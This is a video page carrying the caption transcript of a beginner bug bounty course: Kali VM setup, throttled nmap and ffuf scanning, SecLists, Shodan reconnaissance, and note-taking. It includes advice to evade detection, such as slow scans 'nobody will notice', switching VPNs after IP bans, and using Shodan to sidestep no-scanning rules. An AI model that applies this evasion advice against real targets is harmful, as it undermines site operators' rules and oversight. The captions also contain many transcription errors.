Beginner to Advanced Bug Bounty Hunting Course | UPDATED

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey thanks for stopping by my channel the purpose of this course is to take you from a complete beginner who doesn't even have a Kali Linux machine set up on your computer to someone who's able to successfully go out and find bugs on bug mining programs be able to read the activity and other people's exploits and understand what is going on so I see a lot of videos on YouTube and Twitter threads saying this is everything you need to study in order to become an ethical hacker and I decided instead of just making a road map or some kind of Twitter thread I'll just give you a video that is going to take you through the process of what I think everything you need to know in order to become a bug Bounty Hunter you'll have a great foundation for Recon you'll be able to find the most common vulnerabilities you'll be able to understand some of the more complex vulnerabilities and how to exploit them and what I do in this course is not just tell you what you need to study I actually walk you through the process of studying learning and understanding these exploits so if there's anything specific you want to learn in the world of bug bounty hunting you can look for the time stamp for that specific vulnerability ability and you can go ahead and Skip to that section of the course because you can always come back later all right before we get started and jump in to this course there is one thing that I want to mention these courses and videos do take a long time for me to put out and my YouTube channel is small enough that no one wants to sponsor me so if you'd like to buy some hacker merch that looks kind of like this or this or maybe a little bit of this then you can go ahead and click the link in the description or if you would like to buy one of these courses or if you would like to buy this course or another course or just a section of this course and be able to save your location and come back to it you can check out the link in the description that is going to lead you to my website and if none of that works out that is totally fine you can go ahead and enjoy this free course here on YouTube and I hope that is helpful and beneficial for you in your journey to become a cyber security professional now let's go ahead and jump into it alright it did not take long for us to come to a cross roads where you get to decide what kind of virtual hosting software you would like to use there is a free software called virtualbox you can download it here you can download it for a Mac you can download it for Windows Windows and I strongly recommend you avoid virtualbox I tried using virtualbox when I first started and this was quite a while ago so maybe it is better now but when I ran virtualbox I struggled for months because I did not want to pay any money to have a good virtual machine hosting software but after it kept on lagging and freezing and I couldn't get hack the box to work I decided I was done with virtualbox and I was ready to pay money if you want to avoid paying money and you want to try virtualbox and maybe you'll have better luck than I did you can go ahead and download it here and we'll walk through the steps to do that or you can run VMware if you are running on Windows you will download it here and I'll have this Linked In the course resources you will download the VMware Workstation and you will run this as your virtual machine hosting software VMware is my go-to I still use VMware you get 30 days free so if you're struggling with virtualbox you can try VMware for free for 30 days and you can run your Kali Linux machine on VMware and give it a test I have never had any problems with VMware and it has worked really well for me so it is the one I recommend so you can download it for Windows or you can download it for Mac I am running a Mac and I run VMware Fusion because that's vmware's software for Macs and so this is your decision you can choose which one you would like and begin installing it in the next video all right if you have chosen a virtual box as your virtual machine hosting software May the force be with you and you have much better luck than I did if you were on Windows you will go ahead and download for the windows if you are on Mac you will download for a Mac I have already downloaded virtualbox it is really simple you click download you will extract the download and then this is what you will be brought to a virtual box manager I have a really old machine that's actually deleted off my Mac now you can see the last time I ran virtualbox was in 2020 and I downloaded this virtual machine from Kali Linux and so what you'll do is this will be listed in the course resources however you will come over here you will go virtual machines it will ask you do you want to use virtualbox or VMware and you will choose virtualbox for the sake of this video it is quite a large download I am not going to download it because I am running out of space on my Mac but you will hit download it will save to your downloads if you're on a Mac and I'm assuming it'll save to your downloads if you're on Windows as well and then once it is finished downloading you will open up your file that it is in you will extract it because I think it downloads as a zip and once you have done that and you are ready to open it you will right click on the virtual box image that has finished downloading you will right click on it and it'll say open with and you will click open with virtual box and it will bring you to this page it might actually even try to open the machine and start it and you can let it run and then shut it down you'll want to shut it down because there's a few things you need to set up on it before you do within this settings tab okay one thing I forgot to mention when you launch your box or it automatically starts you will need to click I copied it when you are prompted it's going to ask you where the machine came from I forget the other option all I remember is you need to click I copied it and if you save this machine on like an external hard drive or something and your computer either your windows software or your Mac whatever you're running crashes you can always grab your old virtual machine off that external hard drive and when you put it back onto virtualbox it's going to ask you the same thing and it'll ask you where the image came from and you will select I copied it so remember to select that also you can instead of write clicking and opening it you can come in here and name your Linux box that you've just downloaded from Kali Linux you can go to the place where your virtual box is stored and you can click on it and then you can open it I don't recommend that way because it is more challenging and I remember struggling to get that to even work it's easier just to open with Let The Box start to open either let it open all the way up in your default credentials to log in as Cali is your username and Cali will be your password however shut it down once that's happened because it will begin to lag if you don't you'll need to come into your settings and this will matter based on how much RAM space you have and how many CPUs we will go over to our settings we will want to adjust our Ram to as much as you can dedicate I think I do somewhere around eight to ten I'm really not sure how much I give it I know that it's a lot especially on virtualbox it's going to eat all the ram you give it it will also eat all your CPUs I typically dedicate four to the machine I think the one that I'm I work on the most I might even dedicate eight I might even have more than that I'm not really sure but the more CPUs you can dedicate especially to virtualbox the better because it will use all of what you get it and if you don't have a lot that's okay you just might not be able to run hashcat which we will get to way later in this course I think it'll be somewhere around eight hours into this course you might struggle running hashcat but that's okay you will be able to copy everything as I have ran it for us in the videos and that is it for setting it up you'll hit OK I'm going to close out of it and then you will launch the box you can right click on it and then you can go to start and you will start the machine you will log in and I will see you on the inside all right if you have chosen VMware this video and setup is for you if you have chosen VMware I think you have chosen wisely so what you will do I am running VMware Fusion so I would come down here and I would download the VMware Fusion player I have already downloaded it so I am not going to do that again once it downloads it will save into your downloads and you will extract the zip if it is in a zip folder and then you will open you will drag it on a Mac you'll drag it into your applications and then you can launch your VMware Fusion software if you're on Windows I actually have a Windows box over here which I have not downloaded VMware Fusion on or VMware on but I'm assuming it is going to be done just the same you would come into VMware you would come down to Windows you would download it you will extract it if it downloads into a zip and you will then launch that and you will have something that looks similar to this and it'll look here you go it'll look like this basically exactly what I have here and then from here we are going to put our virtual machine into our virtual hosting software so we will go to Kali Linux this is also linked in the course resources we need a virtual machine so we shall select that if you chose VMware you will download right here it's 2.3 gig I am fairly certain this is zipped and you will need to unzip it there's a several different ways to unzip it and you will have to go about unzipping it however you choose once it is unzipped you can actually go into the downloads where it is saved and you can just click on that unzipped image and you can just drag it over here and you can drop it or you can right click and then select open with VMware Fusion one thing to remember when you open it it's going to say where did this image come from and you're going to say I copied it it's important to click icon copied it or you will not be able to get the image to open now that we have the image on our box we will want to adjust our settings you can right click and go to settings we will want to have our memory really high I went ahead and just put as much RAM as I could dedicate towards it and I have five processors five cores dedicated to the machine as well you will want to dedicate as much as you can spare if you don't have a lot that's okay you won't be able to run hashcat as we will see later on I have tried to run hash cat with less cores and less RAM and it would just air out and say that there is not enough space or memory dedicated to the machine and that's fine if you don't have that I will be able to show you all of the cracked passwords and hashes as we go through this course but the more you have to dedicate to your machine you will be able to faster crack passwords and hashes but this will not be something that we encounter until at least eight hours into the course so you will likely forget about this and you can just run it with however much space you have to dedicate and with that your default credentials when you launch your box you'll right click and you can resume or it'll say start if it's in a powered off State and your default credentials will be the username Cali and the password Cali and with that I will see you on the inside in this video we're going to talk about how to scan specific Targets in bug Bounty programs as well as fuzzing our targets without getting ourselves into any trouble I know there's a lot of interest in learning how to scan and fuzz bug Bounty targets because sometimes you'll be reading through a program's rules and it'll specifically say that there is no scanning allowed now there's a couple ways to get around this and if you watch my Showdown video you can actually use Showdown to scan your bug Bounty targets and then you don't have to worry about anything because you're using showdan and that is one way to get around scanning a Target and staying in the clear now you can use nmap and fuzzing tools to do this as well and that's the purpose of this video so we're going to go ahead and look at this and I'm going to show you how to do this without getting yourself into any hot water and be able to scan these targets without any issue before we get going too far I want to explain to you why you're not allowed to scan these specific targets and there's really two main reasons one the company doesn't want a bunch of bug bounty hunters using a fuff which is going to send several hundred requests per second to their server and have them get dosed and sometimes if you do this you will actually get rate limited or even have your IP ban which is why I always recommend using a VPN but there is a way to go around this and I'm going to show you that at the end of this video and the second reason a lot of programs are going to tell you they don't want you scanning their network is people will use vulnerability scanners and this is just really a big No-No don't use vulnerability scanners recently a program went live and then they were getting scanned so much with vulnerability scanners that they actually removed themselves from the bug mounting program so don't use vulnerability scanners these are the two big reasons why a lot of programs will say no scanning and so just be aware of that if you're going to fuzz for directories make sure to slow down the amount of requests which I'm going to show you how to do and don't use vulnerability scan now first I want to show you how to use in map without getting yourself into any trouble I've so I've gone ahead and opened up tenant from hack the box here if you follow my Channel at all you will know this is my go-to box for web app education and the first thing we are going to do is run an nmap scan so we have opened up our terminal here and you're probably familiar by now within in map scan now this is the typical nmap scan that I like to run I'm going to change the IP right here so if you would like to jot this down this is how I run an nmap scan if I'm doing a capture the flag but we are not doing a capture the flag we're going to be scanning a bug Bounty program and and it's going to look a little bit different so we still want this Dash a we will want a dash capital F and this is only going to scan the top 100 ports so the reason I'm telling you to use the dash f is because if you're new you're probably not going to know which ports you want to look at so I have a list of ports that I use when I run an nmap scan because you don't want to scan all sixty five thousand five 535 ports I think that's how many there are you want to scan just a specific number of ports a lot of networks are not going to want you going out and scanning their entire network but it's okay to go out and scan the top 100 ports they're probably not even going to notice and I'll show you how to make it so that they're not going to notice and you're not going to cause any kind of intrusion and they're not going to care so we want to run the dash f for our ports and then you're going to want to run a dash T and then a one or a two this is going to really slow down your network scan I think that nmap runs on a T3 automatically and if I'm in a hurry and I just want some ports to shoot at if I'm in a CTF I'll run as T5 that's as fast as you can go but if you run a T5 in a CTF you can actually miss Imports so if you're really nervous about running any kind of scan you can go ahead and run a T1 and they're not going to notice that you're scanning their ports this is going to really slow down your nmap scan and then this Dash view right here will tell you the open ports as it hits them so this is going to run a really slow scan on the top 100 ports and nobody's going to notice so you can go ahead and run this and it says that there are two ports and it's going to pop down with the ports as it hits them and So eventually you're going to see Port 80 pop up and I'm not really sure what other ports are open on this program but this is how I would run an nmap scan and so you can see right here it tells us that it's scanning the top 100 ports all right so I decided to go ahead and add in this nmap network scanning legal issues page so if you have any questions about using nmap legally on your specific targets and you're still worried about it you can come and read this right here and it's going to give you a kind of the legalities of using on different networks I am not a lawyer so I decided to go ahead and add this disclaimer in there that you are using this at your own risk and you should check with the laws in your specific State on Port scanning so this is how I would run an nmap scan if I'm running one on a bug binding program this is going to be a really safe scan to run and it's going to tell you the information that you want from these specific ports which ports are are open what versions are running on your target so you can go ahead and play around within map this is how I do it though and I want to show you how to fuzz for directories in a safe Manner and you may still end up getting rate limited which is fine especially if you have VPN you can just switch your VPN so we're going to go ahead and run F now and this is the Syntax for f I'm going to show you this with this a common word list right here and then we'll go ahead and download seclist and you can see a better word list than what is default on the Kali machine we can actually see what we have as options here and you'll see that I'm using the FC to filter out specific codes that I don't want to see and I think I had a 402 on here 403 I don't want to see the 403s but you can leave those in if you want and then you can filter with other ways but we're looking for that Dash p and it is right here and it's going to tell you how to delay your requests and you can slow them down by however much you want from anywhere from 0.15 seconds to two seconds in between requests okay so we have this request here and let's say we really want to take our fuzzing really slow you can run this with a two second delay or a one second delay in between requests um we don't really need to filter out by the not founds and then we're going to run our word list and we're going to run the common word List the common wordless.txt so if you want to you can go ahead and run it just like this and you will have this word list so if we run this you can actually see right here the progress you can see the number of requests that are being sent and so it's sending 37 requests every second which is actually kind of a lot one of the things about fuff is it is really fast you can actually we'll actually show you how fast this will run without slowing it down and you can see right here it's sending 680 around 600 requests per second and that is really fast you're definitely going to get yourself rate limited or or picked up running requests that quickly but buff is my go-to tool I often tell people that you can run derb just like this and you shouldn't find yourself in any trouble because derp is pretty slow but I like to use fuff because of the options that are available with it now I want to go ahead and show you how to install secless I'm actually going to come back here I do have secless already installed which will save us some time but you can come out to Google go to their GitHub page right here and you can run a git clone so we'll copy that right here and you'll want a CD into your opt and then you can type in a git clone right here just like this and you can see it's the last thing I actually installed on here this will take a little while to run and then you can CD into the seclist and you can start looking through all of the different word lists that they have in here so you have a fuzzing directory you have a discovery directory and I actually think the discovery has some pretty good word lists and then we can CD into the fuzzing because that's what we're doing and there is all of these different word lists for you to pick from when you're doing your fuzzings so this is how I would recommend scanning a bug Brandy program if you are looking for specific ports to be open or you are checking for directories so good luck with your bug hunting we're going to be covering the tool showdan for the purpose of a bug bounty hunting and searching for vulnerabilities as well as information disclosure and how to use the tool within the command line as well as the actual browser showdam is is an excellent tool for those who are new to the world of bug bounty hunting or those who are timid when they read a program and it says that you should not scan a network and you don't really want to run in map and you're too afraid to actually scan the network you can go check out Showdown because showdan scans the network automatically and then stores all the information and it's a database so all we have to do is know what queries to run to pull the information from showdan and read their information from when they have crawled the network or the web browser previously and then we have access to all of that information without having to scan the actual Target and you don't have to worry about breaking any program rules so the way Showdown works is actually goes out and crawls every single device that is connected to the internet whether it be your thermostat your refrigerator or your web security cameras and it'll see if there's any vulnerabilities it'll store the information such as the software that is currently running on it and if it has any vulnerabilities it is now open to the web and anyone can access your information your thermostat refrigerator your webcam or even your printers if they have any vulnerability these then the whole world will know it because all they have to do is query that specific version such as WordPress 1.4.7 and if you have a web application that is running that specific WordPress version the whole world is going to know it because there will be a cve on it and you will be open to a potential attack so the way Showdown works is it just crawls all of the internet and stores all of the information that it can possibly grab for anything that is connected to the internet so what we're going to do in this video is run queries on Showdown but because we're going to be doing this with a free account you're only going to be able to run a very limited amount of commands or scans if you're actually wanting to use The Showdown scan feature you're going to actually have to pay for it I think it's 70 a month which is kind of steep I personally would rather just scan it myself with nmap and look at the ports I specifically want and read the information that comes back that way but I know that some of you would probably rather just pay the 70 a month and have access to the monitoring feature that we're going to cover a little bit later on so typically when I think of the people who are going to enjoy enjoy it Showdown the most I often think that black hat hackers are going to be the ones who love Showdown the most because it stores all the different version numbers and if a new cve comes out and somebody says okay we have this vulnerability to this specific software they can just scan all of the internet and find out what devices are running that specific software because black hats don't really care they can just attack anything but this can also be helpful for bug bounty hunters as well because if a new CV comes out you can go out the same way as a black cat would and say Showdown show me all of the devices running the specific software that are vulnerable to this cve and then you can download all of those devices and look through them to see if there are any web applications that are running that specific software and then see if they have a bug binding program and report it this is going to be kind of tedious but it'll be really easy bugs to find and vulnerabilities to report because all you have to do is read the downloaded file and look for open Bug bounding programs on those specific web applications so an example of Showdown being used in a really massively way kind of for an unethical purpose can be seen on Dark Net Diaries I forget the name of this specific episode I think it came out a couple months ago and the guy goes by the hacker giraffe where he actually used Showdown to look for vulnerable printers and he printed subscribe to PewDiePie to over 50 000 different printers he was able to do this really easily and really quickly because he was able to just use Shodan to look for vulnerable printers and so in that episode of darknet Diaries I think you can just look up darknet Diaries hack for giraffe and listen to it if you want all that guy did specifically was go to Showdown and look for vulnerable printers and it seems like that's kind of one of his go-to tools is to go to Showdown look for some vulnerable software and then look at all of the devices that happen to be vulnerable to that specific software or cve so let's go ahead and jump into it here we are I have gone ahead and opened up a terminal which you will want to do and then you will also want to go to showdan.io I'm already logged in you'll click login over here I personally just log in with Google and this is a non-paid account so we are going to be looking at basically the exact same setup that you're going to have when you first open up a showdan the first thing we're going to do is be using showdan from the terminal so if you just come in here and type in showdan and hit enter you're going to get a bunch of options now these options are going to be default and Showdown should already be installed on your Kali Linux machine so I'm not going to actually walk you through how to install Showdown because we're going to run it straight from here first in the terminal and then we'll go through and actually check out the browser version later on I've decided to show both the terminal and the browser because there are some people who really like running things straight from the terminal and you'll be able to play around with it and figure out exactly what you like and then there are other people who like to have a graphical user interface and they'll like the browsing version better and so what we're going to do is go ahead and initialize our Showdown for the terminal and you can see this right here this init so we're going to end up running a showdan init but we also need to have our API key so you'll want to go ahead and log in so you'll want to go ahead and create an account and log into shodin just like this and then you will click account and you will be able to grab your API key right here so we'll copy this and come back to our terminal and we're going to type in shonan init and then you will paste in your API key and hit enter and it tells us that it has successfully initialized and now we are ready to start making some Showdown queries so the first thing we can do is just run a showdan info right here and see what it tells us about our account so we can type in showdan info and then hit enter and it's going to tell us we have zero credits available and scan credits available and that is probably because I have already ran some queries with this over here on the website but it's not really going to make a difference I'm going to show you how to run these queries I just might not get the results back that you will every time you make a request whether it is over here on the actual browser or it is inside of the terminal it is going to use one of the credits that you have but you can always pay And subscribe to Showdown and have more credits most of the bug Hunters who are successful will have a paid subscription to Showdown and they really like using showdan and we're going to cover why it's helpful but personally a lot of the stuff you're going to be able to get on Showdown you can find your own self by running some different tools which I've covered on my channel previously but that is not the purpose of this video so the second thing I want to show you is often when you want to run something like let's say we want to run this showdown scan right here what we can do is we can run showdan scan and then a dash H and it's going to tell us the options for the actual scan right here so you can run a showdown Dash H and then you can run The Showdown scanned sh and it's going to tell you the list of commands that you can run with each one of these with each one of these commands that comes first so when you're using Showdown it'll be really helpful for you to know that you can run the Das H with each one of these so that you know exactly what you're going to be getting back and exactly how to get the information that you want in the future and a lot of your understanding from these right here is going to come from playing around with them and reading the documentation and just pressing the Das h on each one of them and figuring out what exactly they do so one of the first ways to check out showdan is we can just say showdan and then count and then we'll say WordPress and when you run this this might not work for me because I don't have any credits but when you run something like this you can see that we just want to count the number of results for this search so what will happen is a showdown will go out and count all of the servers that it has and it's a database that are running this WordPress right here and it actually did tell us it tells us it has 52 but if you wanted to run something a little more specific I spelled that wrong that makes more sense so 500 000 so if you were to run something like this you might want to say you're looking for a WordPress version 1.4.7 because that's what your target is running or there's maybe a new cve out there and you just want to see okay what web apps are running WordPress 1.4.7 and then you'll get Showdown will give you a list of those actual web apps that are running that and then you can see if any of them have a bug Bounty program and then report to them hey this new cve for this WordPress has come out so it saves you from having to go out and actually find a specific Target and then looking to see what it is running because Showdown won't actually do the heavy lifting for you and so all you have to do if you are a bug Bounty Hunter is say this is the version the brand new cve has come out for it so you would say Showdown 1.4.7 which I actually don't even know if this is a real version you would run this and it is and you would say okay there's seven web apps that are running this version currently in The Showdown database and then you would just go out and look to see if any of these seven have a bug Bounty program and if they do you can report hey the cve came out and You're vulnerable to it and so that's a really simple way to find bugs and it's all based on recon and you really don't have to do any heavy lifting very simple you've seen how fast this has gone and you could potentially have found a bug if this version were vulnerable to a cve that had just come out so if you're familiar with nmap what Showdown does is pretty similar it goes out scans the network and it brawls all of the internet and pulls the banners the versions what's running if it's Apache if it's Windows if it's got WordPress running and what ports are open and so with Showdown we can just query all of this and it stores this in the database and that's how it already knows that there is seven web apps running this WordPress 1.4.7 because it is already all it has to do is check its database and it doesn't actually have to go out and scan but showed but we can scan with showdan and we're going to look at this in a little bit but I just want you to know how Showdown works and it already has stored all of this information on there so now you can see how this is kind of a go-to tool for the black hat hackers because they don't really care if these seven web applications have a bug Bounty program or not they just are going to attack it and see what information they can get out because they don't really care about following the legal rules and the law but as a bug Bounty Hunter you need to make sure that these seven web apps if they were vulnerable to a cve they could attack WordPress 1.4.7 you would want to make sure you do everything legally that you actually don't exploit the cve there's no need to actually go and try and exploit it you can just report it hey there's the cve that came out and you are vulnerable and you should be rewarded for it and so as a Bug Hunter and a penetration tester we're looking for very specific targets and then we can just run through these seven real quick and see who actually is vulnerable so now if we actually want to see what these seven web applications are that are running this WordPress right here we can use the download feature within showdan now I personally if I was attacking a specific Target would just run in map instead of using showdan for this but I want you to be aware that you can actually pull down version numbers of web apps with showdan itself but personally I would run nmap just to grab the banners in the version of a specific Target this is something that you would be using if you were just looking for a cve that just came out like we were previously talking about and we would use the download function for this a show we would just grab Showdown and then we would say download and then we're going to download the file as let's say WordPress file and I'm not actually sure if it will work with this version number I've only ever ran it without the version number so maybe we can throw this inside of quotes and see if this works if not we will just run it without quotes and see how that runs so we'll run this and it has saved Five results into our WordPress Json file dot gz and we can unzip this and grab the file by typing in a g unzip and then we want to run our WordPress file and then if we LS we should have our WordPress file.json and I do not have G edit installed because this is a new machine and if you don't have geda installed either you can sudo apt update and I've already done a sudo apt update recently so I'm going to sudo apt install G edit and this will only take a second to download and now we can G edit our WordPress file right here and we can look at the contents and this looks really messy so what you can do is actually just copy this hit a command a and a command C and then we can come over here and we can just type in beaudifier like this and we can just click on the top one and see if it will work for us paste in the Json for us and type you can click beautify and now we have our results right here so it actually looks the same over here it actually didn't make any difference so maybe this one doesn't work for us it tells us we have an air okay we're gonna just look at it right here so you can actually see right here you get a hash you are told it's from Showdown it'll tell you the region from where the web app was coming where the web app is coming from it's going to give us the time that it was crawled we get the server that it is running on and we have all of this different information here that it that Showdown has crawled from this specific Target we actually grab an ASN number if you were looking for a specific Target and you needed to and you needed to pull down a version and you were looking for a specific cve and you wanted to download so you could actually see what the showdan databases have stored for the WordPress 1.4.7 instead of just seeing Oh there's seven of them you would download it into a file just like this right here and then you would unzip it and then you can G edit and actually look at the contents of the file and find the servers and the subdomains the URLs the as numbers and there's a lot of information in there that's going to be really helpful for you in your recon phase if these targets are actually vulnerable and they do have a bug Bounty program so one of the other things you're able to do with Showdown is run a is to run an IP address on the showdan Crawlers and so you're and one of the ways to grab an IP address so one of the ways you're going to be able to find the IP address there's several different ways that are going to be really easy so if we wanted to run just say a host yahoo.com it's going to give us back right here this range of IP addresses that are running on yahoo.com and if you wanted to just ping Yahoo .com we will be told right here is one of the IP addresses that we were able to Ping so if you look for this 74.14326 we can scroll up and see that this is one of the IP addresses right here you're actually able to find IP addresses through a burp as well so what we can do is come over here and open up a new tab type in yahoo.com and we can open up burp and intercept with the proxy and if we run this you'll actually be able to see right here on 443 you have this 98371163 and if you come back here you should be able to find right here and so those are several different ways to find IP addresses for a specific domain I'm actually going to close out of this but this is one way to do that and then you can just type in showdan and then we would type in host and then we can grab one of these IP addresses that we just saw and run it within showed in and it's going to give us some information right here it's going to tell us that this port 80 is open and Port 443 is open and it'll give us other information if you specifically want to look for an SSL certification you can find those and it's going to tell us it's running these different versions and you can go check to see if these SSL versions are out of date or what you can do with these within your recon phase you also get these other host names right here that can be associated with IP ranges and you can run a showdown host with an IP range and it's going to pull down a bunch more information for you within the entire range it'll give you all of the ports that are open within with the IPS and so the difference here between what we're able to find between Google and showdan is Google goes out and crawls the pages to see what is reachable but Showdown across all of the Internet connected devices and this is why you would find a refrigerator that might be connected or a webcam or or somebody's property cameras or literally anything that is connected to the internet like a thermostat and Showdown actually crawls everything that is connected to the internet and stores the data so one of the good things about running showdan like this is sometimes you are going to come across bug Bounty programs they're going to tell you that you are not allowed to scan a specific Network and as new bug bounty hunters I know there is a lot of questions about what you're allowed to do and what you're not allowed to do and so Showdown is a great way to scan a network without actually scanning a network because showdan already has stored all of the information that you're going to be looking for and you just have to go out and find it you have to know what commands to give such as this one right here if you're looking for open ports I personally would rather just run nmap with the ports that I want to find such as Port 22 port 80443 1443-3389 or whatever other ports you might come across but I would rather run in map with specific ports but I know there are some people who really worry about this and show Dan is a great option such as this showdown host right here to grab other domains you can grab subdomains and you can scan for ports and IP ranges and so this is an option if you're worried about scanning a Target in order to grab subdomains and open ports and what I like to use for running subdomains is amass and I'll go ahead and Link My amass video in the description if you would like to learn more about that so let's go ahead and look at scanning a host instead of just looking at this right here The Showdown host so with showdan you can actually just type in showdan we'll go scan Dash H and we can look to see what our options are for scanning a IP and so it tells us right here we can scan an IP and we can say showdan scan and then we can give it the IP that we want and we'll just run this same IP address right here and see what information it gives back to us it tells us we need to give give it a command so we can say submit right here because we're going to submit an IP address it tells us that I don't have any credits to actually run this scan submit so I would need to actually go and pay in order to make get my I my API key right here some credits but I am not going to do that so this is another way to go ahead and scan a network or an IP address to find what is open and do a little more Recon with this you can also go out to I've I cannot remember what is called Hurricane Electric I think it's vgp.h e.net all right so here we are we can just type in yahoo.com and I've shown this before in another video so we'll just go Yahoo and this website seems to be running really slow but you would just run the search up and it has come back so you can grab these as numbers right here or these asns is the easier way to say it and I would run these through a mass personally because it would be easier but you can run these through showdan as well Showdown is going to be a lot faster because all it has to do is query back to the database whereas amass seems to take quite a bit longer in getting you the information back but you can come out here and grab a network rage scan a network range you can look through these asns and see what you can find right here I've already made a video about that so I'm not going to go into too much detail about that but like I said I personally would go with nmap if I was going to scan any kind of network or anything like that now we're going to move on to the web browser so what's really cool about running Showdown in the browser is they give you this filters cheat sheet so if you you wanted to look for a specific Network or a range or a cider range you can do that right here through the search filter and the way you would do these commands is by typing in say we wanted to find the organization Yahoo like this we can search it and it's going to pull it down for us let's see what else I've ran up here if we delete this we can run an IP address and we already ran this one and it'll pull down the information here's that Port 80 that it said was open here's Port 443 and it has grabbed us all of the banners right here and we can read through them and see what is running you can also download the reports from here as well one of the cool things about one of the cool things about running through the browser is you can actually look for sensitive information disclosures if you just continue to look through here and you'll need to read through the cheat sheet and I would also recommend reading through like their documentation because there's way more examples that you're going to be able to use so if we wanted to look for something that's running Apache with a specific Apache version you could look to see if you're able to run maybe there is a Apache 1.7.4 that actually has a vulnerability you can come up here and you can just type in the product Apache with the version number and and see if you're able to find any vulnerabilities for that Apache version just like this and you would run through here and say okay these people might be vulnerable to this do they have a bug binding program okay these people are running this version do they have a bug burning program and so there's a lot of different ways you can be creative with looking for known vulnerabilities new cves looking for bug Bounty programs that are vulnerable and then you can look for sensitive information with Showdown because it doesn't know what is going to be sensitive or not it's just going to grab all of the information and stored in the database and it's up to you as the bug Bounty Hunter to look at that specific Target and see if there's any sensitive information being disclosed on Showdown and then you can report it okay and one of the last things I want to cover is the monitor function and you have to have an account in order to use this but this is something that you might be interested in the monitoring is you can enter in a specific Target such as yahoo.com and it will update you whenever a new software comes out or whenever there's an update made to the program that you are trying to monitor it'll let you know and you can be one of the first ones to go and check out that new subdomain or domain if it is in scope or if they update a software you can be one of the first ones to go see if there are any cves out for that specific software that they have updated so the monitor is one that bug mounting Hunters really like to use because you are able to get notifications of when things change on a specific Target and you'll be one of the first ones to know one of the first ones to be able to go out and test it but you will need to be willing to pay seventy dollars a month I personally don't think it's worth it but I know there are a lot of bug mounting Hunters who do think it's worth it so it might be worth it to you to Monitor and just pay the 70 a month so that you can follow specific targets and be one of the first ones to go out and check those targets for vulnerabilities so with that concludes our video on Showdown one of the things I want to make sure you understand is that when you run a showdown scan and you're thinking about trying to exploit something you need to make sure that it's in scope and has a bug Bounty program otherwise you could be getting yourself into some illegal trouble and make sure before you go ahead and start looking at a specific Target to see if it has a bug binding program so if you have any comments or questions please let me know down below and I'll try to get to those as soon as I can thanks for watching we are going to be covering how to take notes for the world of bug bounty hunting or maybe you are wanting to become a penetration tester note-taking is going to be really important to you and your method of note taking and actually being able to go back and overview what you have already done and gone through your checklist is going to be really important so in this video I'm going to show you how I take notes and we're going to use cherry tree within Linux because everybody's going to have access to this I personally use OneNote but it's going to be really similar to what I'm going to show you in this video some of the benefits of taking really good notes is going to be having organized thoughts and being able to write a really simple proof of concept you'll be able to have a screenshots and be able to see what you have previously done and you're not going to waste a lot of time going back to subdomains that you've already enumerated and looked at because you already have all of your notes there for you and know that you've already looked at it and if a new vulnerability comes out you can go and see when the last time you enumerated looked at this specific subdomain and know if the new cve is going to be applicable to this specific domain and the software that's running on it so with that let's go ahead and jump into it so here we are on our Kali Linux machine we can come up to the little drop down menu and we can type in cherry tree and it will be automatically installed if you're running at Kali Linux so using cherry tree is going to be really pretty simple the first thing you're going to want to do in your notes is you're going to have the main domain and all of the information that you found on it so you can type in the domain.com and this is going to give you this parent node right here and you can also change up up your note-taking method and maybe you want to have the main domain and you have each subdomain right here like this you could have a subdomain one only it would actually be the subdomain name right here and then you'll have all of your nodes from that subdomain but if you do this there are some programs that have like 800 subdomains and this would take forever to do but you can come in here and do every single subdomain like this and so it'd be if we could just say a sub.domain.com spelled that wrong like this and then you would have all of your notes within this specific subdomain so if you decided to go this way one of the things I would suggest doing right out of the beginning is when you put in your first sub node is maybe just called this the software right here and you can run you can say that it's running some kind of CMS maybe it's running WordPress and then you'd have the version of 4.2.4 and then you can know that this is what's running Subway in the future if there's any kind of cve that comes out for the WordPress version that's running you can come back to this subdomain and see if it's vulnerable to that new cve another reason you're going to want to have some kind of list of the subdomains so let's go ahead and delete this one right here so it looks a little better if you decided to run a bunch of subdomains in here so we can type in sub 1 dot domain Dot com and in here you have a list of all of your subdomains you can have actually subdomains in here within this specific thing that you're looking at so in here we could say software and you can see how this is going to organize our research for us and inside of the software in here you would put your WordPress and then the version that it is running so these are a couple different ways to kind of organize your notes and another way to save time instead of actually going through and typing all this out is on this box I already have lapalyzer installed so I could just come we can come to the browser and type in like google.com and open up appleizer to see what information is there and now we could open this up right here and I could just screenshot this and pull that screenshot over to my Cali machine and then I can put it into a cherry tree so I could grab this and pull it over and put it into a cherry tree I actually don't have this specific Cali box set up to do that so it's not going to work for this one but on my actual personal Kali Linux machine that I use I can just pull screenshots back and forth over to my Cali machine and save them inside of cherry tree but I use OneNote so I don't really have to worry about that too much so screenshotting and adding information in here is going to be helpful as well if you have that capability and one of the things I like to do is at the end of a Recon session is make a node like this and we'll just call it a Recon node and then in here I write down all the tools I ran and the way that I collected all of the information so that way I have a clear set of notes and that way if I ever come back to this specific Target I can see if maybe I've missed something or maybe I've learned some kind of new Recon technique that I can try out on this specific Target and I'll know what exactly I have done on this Target and what I can do in the future to further analyze the information on my specific Target so make sure to write down your methodology of your recon and attack because it may change in the future and you might be able to go back to Old notes and old targets and further do enumeration and testing and lastly one of the things that is going to be really helpful for you in your note-taking process is to have some kind of a checklist and so one of the last things you're going to want to have is a good checklist of vulnerabilities and Recon and you can just go out to Google and look for a bunch of different checklists and find whichever one works best for you maybe copy paste it and put it into a Word document and modify it and make your own but in the meantime you can just Google bug Bounty checklist and click on one of the checklists and then look to see what is in here and you can follow their Recon maybe there's something in here you don't like I used to use HTTP probe but I decided I actually like going out and checking things manually so I don't use this anymore but it would be helpful for you to have something like this some kind of checklist so that way you don't miss any bugs or vulnerabilities or maybe hidden subdomains that you would have otherwise missed without a checklist so this will be really helpful for you as you're working on your recon skills in the future and developing them so there's a lot of ways to take notes I showed you Cherry Tree only because it's in Kali Linux and everybody who is going to be running a virtual machine is going to have access to Kali Linux and they're going to have access to Cherry Tree but I personally use OneNote and maybe there's something else out there that you like to use all right we are going to look at a URL real quick and look at the different parts of the URL just so you can get an understanding of what is going on when you look at these it's really important in your recon phase to be able to know what URLs look interesting that you can copy and paste into your notes so that you can come back once you have finished your recon phase and actually start testing so I've gone ahead here and just typed out a basic example and you're probably all familiar with https and the HTTP protocol and it is labeled as the schema the www dot is not always there this is labeled as the subdomain because sometimes this could be a this could be a subdomain listed as sub dot domain and so this is actually a subdomain but that is the same thing as the www dot and so right here we have the domain name which would be like google.com and I'm not really sure why the.com is actually listed as the top domain level because you can use in here like dot UK dot FR for different countries.net.org for an organization and it's still called the top domain level but that is this portion of the URL so all of this is a pretty 